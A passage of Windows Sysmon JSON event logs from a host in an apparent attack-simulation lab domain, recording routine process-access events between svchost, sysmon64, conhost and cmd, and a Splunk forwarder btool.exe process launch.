C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3468,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3469,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3470,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3471,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3472,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3473,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3474,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010924B0500}\r\nTargetProcessId: 3344\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010924B0500}","TargetProcessId":"3344","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3475,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nProcessGuid: {A837DB8D-023C-5F25-0000-00104E4C0500}\r\nProcessId: 4656\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-023C-5F25-0000-0010924B0500}\r\nParentProcessId: 3344\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","ProcessGuid":"{A837DB8D-023C-5F25-0000-00104E4C0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 